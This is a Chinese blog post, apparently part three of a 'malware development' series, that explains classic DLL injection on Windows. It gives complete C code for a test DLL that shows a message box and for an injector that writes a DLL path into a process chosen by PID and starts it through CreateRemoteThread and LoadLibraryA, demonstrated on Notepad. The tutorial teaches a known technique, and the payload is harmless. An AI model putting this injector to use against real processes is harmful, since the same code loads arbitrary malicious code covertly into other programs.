什么是dll注入?

DLL注入允许将外部DLL文件加载到进程中并运行其中的代码。DLL(动态链接库)是一种可重用的代码库,它包含在多个程序中使用的函数、类、变量和其他程序代码。DLL注入技术可以通过将DLL文件注入到目标进程的地址空间中,从而允许程序能够访问其中的代码和数据。DLL注入通常用于许多不同的目的,包括增强程序的功能,修改程序的行为,以及执行恶意活动,如间谍软件或病毒。在某些情况下,DLL注入也可以用于调试或测试程序,或者在某些特定场景下进行一些修改或定制。(来自ChatGpt的解释)

生成dll文件

我这里使用DevCpp新建了dll项目





新建的项目有两个文件,一个是dll.h,一个是dllmain.cpp,将这两个文件修改为如下代码,在dll被映射到了进程的地址空间时弹窗:

dll.h代码:

#ifndef _DLL_H_
#define _DLL_H_ #if BUILDING_DLL
#define DLLIMPORT __declspec(dllexport)
#else
#define DLLIMPORT __declspec(dllimport)
#endif class DLLIMPORT DllClass
{ }; #endif

dllmain.cpp代码:

/* Replace "dll.h" with the name of your header */
#include "dll.h"
#include <windows.h> BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved)
{
switch(fdwReason)
{
case DLL_PROCESS_ATTACH:
{
//当这个DLL被映射到了进程的地址空间时
MessageBox(0, "inj!\n","inj",MB_ICONINFORMATION);
break;
}
case DLL_PROCESS_DETACH:
{
//这个DLL从进程的地址空间中解除映射
break;
}
case DLL_THREAD_ATTACH:
{
//一个线程正在被创建
break;
}
case DLL_THREAD_DETACH:
{
//线程终结
break;
}
} /* Return TRUE on success, FALSE on failure */
return TRUE;
}

然后进行编译得到test.dll文件。

编写注入文件

主要步骤如下:

  • (1)打开目标进程
  • (2)分配目标进程的内存
  • (3)将dll加载到目标进程
  • (4)在目标进程中创建新的线程

这里涉及到的函数有:

(1)OpenProcess:用于打开指定进程的句柄,以便在进程间进行通信或操作。

HANDLE OpenProcess(
DWORD dwDesiredAccess, // 访问权限
BOOL bInheritHandle, // 是否继承句柄
DWORD dwProcessId // 进程ID
);

(2)VirtualAllocEx:为远程进程分配内存缓冲区,这个函数可以用于实现共享内存,动态加载DLL文件,以及创建线程栈等操作。

LPVOID VirtualAllocEx(
HANDLE hProcess, // 目标进程句柄
LPVOID lpAddress, // 分配的内存地址
SIZE_T dwSize, // 分配的内存大小
DWORD flAllocationType,// 内存分配类型
DWORD flProtect // 内存保护属性
);

(3)WriteProcessMemory:在进程之间复制数据,该函数可用于在不同进程之间共享数据,或者在同一进程中的不同线程之间共享数据。:

BOOL WriteProcessMemory(
HANDLE hProcess, // 目标进程句柄
LPVOID lpBaseAddress, // 目标内存地址
LPCVOID lpBuffer, // 写入数据的缓冲区
SIZE_T nSize, // 写入数据的大小
SIZE_T *lpNumberOfBytesWritten // 实际写入数据的大小
);

(4)CreateRemoteThread:用于在指定进程中创建一个远程线程,并在远程线程中执行指定的函数。该函数可用于在不同进程之间执行函数,或者在同一进程中的不同线程之间执行函数。

HANDLE CreateRemoteThread(
HANDLE hProcess, // 目标进程句柄
LPSECURITY_ATTRIBUTES lpThreadAttributes,// 线程安全属性
SIZE_T dwStackSize, // 线程栈大小
LPTHREAD_START_ROUTINE lpStartAddress, // 线程入口地址
LPVOID lpParameter, // 线程参数
DWORD dwCreationFlags, // 线程创建标志
LPDWORD lpThreadId // 线程ID
);

(5)WaitForSingleObject:用于等待一个指定的对象变为有信号状态。

DWORD WaitForSingleObject(
HANDLE hHandle, // 要等待的对象的句柄
DWORD dwMilliseconds // 等待时间,以毫秒为单位
);

(6)VirtualFreeEx:用于释放指定进程中的虚拟内存。

BOOL VirtualFreeEx(
HANDLE hProcess, // 要释放虚拟内存的进程的句柄
LPVOID lpAddress, // 要释放的虚拟内存的起始地址
SIZE_T dwSize, // 要释放的虚拟内存的大小,以字节为单位
DWORD dwFreeType // 释放类型
);

完整代码如下:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <tlhelp32.h> char evilDLL[] = "C:\\Users\\16537\\Desktop\\test.dll";
unsigned int evilLen = sizeof(evilDLL) + 1; int main(int argc, char* argv[]) {
HANDLE ph; // 进程句柄
HANDLE rt; // 远程线程
LPVOID rb; // 远程内存 // 获取LoadLibraryA函数的地址
HMODULE hKernel32 = GetModuleHandle("Kernel32");
VOID *lb = (VOID *)GetProcAddress(hKernel32, "LoadLibraryA"); // 判断进程是否存在
if ( atoi(argv[1]) == 0) {
printf("PID not found!\n");
return -1;
}
printf("PID: %i", atoi(argv[1])); // 打开目标进程
ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1]))); // 分配远程进程的内存
rb = VirtualAllocEx(ph, NULL, evilLen, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); // 在进程间复制dll
WriteProcessMemory(ph, rb, evilDLL, evilLen, NULL); // 在目标进程中创建新的线程
rt = CreateRemoteThread(ph, NULL, 0, (LPTHREAD_START_ROUTINE)lb, rb, 0, NULL); // 等待远程线程执行结束
WaitForSingleObject(rt, INFINITE); // 清理内存空间
VirtualFreeEx(ph, rb, 0, evilLen); CloseHandle(ph);
CloseHandle(rt); return 0;
}

这里将dll注入到notepad中,先打开一个记事本,通过processhacker找到PID:



接着编译上面的代码得到evil_inj.exe,再运行这个exe



可以看到注入成功,在processhacker中可以看到notepad加载了test.dll

恶意软件开发(三)经典DLL注入流程的更多相关文章

  1. 使用react全家桶制作博客后台管理系统 网站PWA升级 移动端常见问题处理 循序渐进学.Net Core Web Api开发系列【4】:前端访问WebApi [Abp 源码分析]四、模块配置 [Abp 源码分析]三、依赖注入

    使用react全家桶制作博客后台管理系统   前面的话 笔者在做一个完整的博客上线项目,包括前台.后台.后端接口和服务器配置.本文将详细介绍使用react全家桶制作的博客后台管理系统 概述 该项目是基 ...

  2. [转]Dll注入经典方法完整版

    Pnig0s1992:算是复习了,最经典的教科书式的Dll注入. 总结一下基本的注入过程,分注入和卸载 注入Dll: 1,OpenProcess获得要注入进程的句柄 2,VirtualAllocEx在 ...

  3. 反射Dll注入分析

    (源码作者:(HarmanySecurity)Stephen Fewer) 0x01  反射Dll注入的优点  1.反射Dll注入的主要优点是它没有以主机系统的任何方式(例如LoadLibrary和L ...

  4. DLL注入新姿势:反射式DLL注入研究

    在分析koadic渗透利器时,发现它有一个注入模块,其DLL注入实现方式和一般的注入方式不一样.搜索了一下发现是由HarmanySecurity的Stephen Fewer提出的ReflectiveD ...

  5. DLL注入实践

    Windows系统大量使用dll作为组件复用,应用程序也会通过dll实现功能模块的拆分.DLL注入技术是向一个正在运行的进程插入自有DLL的过程. Window下的代码注入 常见的Windows代码注 ...

  6. 从零开始实现ASP.NET Core MVC的插件式开发(三) - 如何在运行时启用组件

    标题:从零开始实现ASP.NET Core MVC的插件式开发(三) - 如何在运行时启用组件 作者:Lamond Lu 地址:https://www.cnblogs.com/lwqlun/p/112 ...

  7. Dll注入技术之APC注入

    APC注入的原理是利用当线程被唤醒时APC中的注册函数会被执行的机制,并以此去执行我们的DLL加载代码,进而完成DLL注入的目的,其具体流程如下:     1)当EXE里某个线程执行到SleepEx( ...

  8. 第22章 DLL注入和API拦截(2)

    22.4 使用远程线程来注入DLL 22.4.1 概述 (1)远程线程注入是指一个进程在另一个进程中创建线程,然后载入我们编写的DLL,并执行该DLL代码的技术.其基本思路是通过CreateRemot ...

  9. 基于Spring MVC的Web应用开发(三) - Resources

    基于Spring MVC的Web应用开发(3) - Resources 上一篇介绍了在基于Spring MVC的Web项目中加入日志,本文介绍Spring MVC如何处理资源文件. 注意到本项目的we ...

  10. [转载]解析WINDOWS中的DLL文件---经典DLL解读

    [转载]解析WINDOWS中的DLL文件---经典DLL解读 在Windows世界中,有无数块活动的大陆,它们都有一个共同的名字——动态链接库.现在就走进这些神奇的活动大陆,找出它们隐藏已久的秘密吧! ...

随机推荐

  1. .NET 云原生架构师训练营(模块二 基础巩固 MVC终结点)--学习笔记

    2.3.4 Web API -- MVC终结点 MVC与MVVM 模型绑定 自定义模型绑定器 模型验证 返回数据处理 MVC与MVVM MVC ASP.NET Core MVC 概述:https:// ...

  2. [JVM]GC日志解读解析

    GC日志解读解析 示例代码 package jvm.test1; import java.util.Random; import java.util.concurrent.TimeUnit; impo ...

  3. react中的setState是同步还是异步?react为什么要将其设计成异步?

    壹 ❀ 引 了解react的同学都知道,react遵守渲染公式UI=Render(state),状态决定了组件UI最终渲染的样子(props也可以理解为外部传入的状态),由此可见state对于reac ...

  4. NC20115 [HNOI2015]菜肴制作

    题目链接 题目 题目描述 知名美食家小 A被邀请至ATM 大酒店,为其品评菜肴. ATM 酒店为小 A 准备了 N 道菜肴,酒店按照为菜肴预估的质量从高到低给予1到N的顺序编号,预估质量最高的菜肴编号 ...

  5. NC202589 魔法数字

    题目链接 题目 题目描述 牛妹给牛牛写了一个数字n,然后又给自己写了一个数字m,她希望牛牛能执行最少的操作将他的数字转化成自己的. 操作共有三种,如下: 1.在当前数字的基础上加一,如:4转化为5 2 ...

  6. 使用OpenWrt实现IPv6 DDNS

    OpenWrt 增加 crontab 任务 在/root/crontab/ 目录下, 创建脚本 ddns.sh #!/bin/sh # 远程php脚本的URL地址 SERVICE_URL=http:/ ...

  7. tmpwatch命令

    tmpwatch命令 tmpwatch递归删除给定时间内未访问的文件,通常用于清理用于临时存放空间的目录,并可以设置文件超期时间,默认单位以小时计算. 语法 tmpwatch [-u | -m | - ...

  8. 项目实战:Qt中英文输入软键盘(支持Qt4、Qt5、触摸和键鼠混合输入等)

      需求   1. 全屏软键盘:  2. 输入英文:  3. 输入中文:  4. 支持触摸.键盘和输入混合输入:  5. 目前有黑色系皮肤:  6. Qt4和Qt5区分2个版本:   Demo:Qt5 ...

  9. 类型注解Callable

    from collections.abc import Callable """ Callable[[ParamType1, ParamType2], ReturnTyp ...

  10. 数据抽取平台pydatax介绍--实现和项目使用

    数据抽取平台pydatax实现过程中,有2个关键点: 1.是否能在python3中调用执行datax任务,自己测试了一下可以,代码如下:    这个str1就是配置的shell文件 try: resu ...